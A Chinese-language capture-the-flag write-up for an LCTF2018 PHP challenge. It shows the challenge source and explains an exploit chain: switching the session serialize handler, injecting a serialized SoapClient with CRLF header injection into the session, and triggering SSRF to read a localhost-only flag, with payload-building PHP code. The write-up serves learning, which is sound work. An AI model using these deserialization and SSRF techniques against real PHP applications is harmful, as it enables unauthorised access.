题目源码

index.php

 <?php
highlight_file(__FILE__);
$b = 'implode'; //可被覆盖
call_user_func($_GET['f'], $_POST);
session_start();
if (isset($_GET['name'])) {
    $_SESSION['name'] = $_GET['name'];
}
var_dump($_SESSION);
$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');
call_user_func($b, $a);
?> 

flag.php

<?php
session_start(); 
echo 'only localhost can get flag!'; 
$flag = 'LCTF{*************************}'; 
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ //要通过ssrf来获取flag
 $_SESSION['flag'] = $flag; 
}?>

解题思路：利用session反序列化触发soapclient类方法进行ssrf访问flag,php

第一步：

session反序列化需要session.serialize_handler使用与默认不一样，所以首先用第一个call_user_func执行session_start('session.serialize_handler','php_serialize')设置用php_serialize来处理session，同时session反序列化时构造的类为soapclient

利用soapclient构造ssrf

<?php
$a = new SoapClient(null,
    array(
        'user_agent' => "aaa\r\nCookie:PHPSESSID=u6ljl69tjrbutbq4i0oeb0m332",  //这里可以通过加crlf的方法控制header，带上自己的sessionid
        'uri' => 'bbb',
        'location' => 'http://ae0bb0f2-f512-4118-8f03-60a13b829c0a.node4.buuoj.cn:81/flag.php' //向此处发起请求
    )
);
$b = serialize($a);
echo urlencode($b);
?>

然后将其前加|传入name中（写入session并被php解析为键值）

 

此时name被通过php_serialize处理写入了session数组中

第二步：

要想办法触发soapclient的序列化值，要先调用其中的_call，此时用php引擎来反序列化session，$a数组中第一项即为我们构造的soapclient类，在第二个call_user_func中让这个类调用不存在的方法即可触发ssrf

做题过程中遇到了一个坑，如果soapclient发起请求中带的sessionid是自己在本题环境中拿到的sessionid则第二步会造成死循环引发504错误

回头看思路有迹可循但确实好难想到啊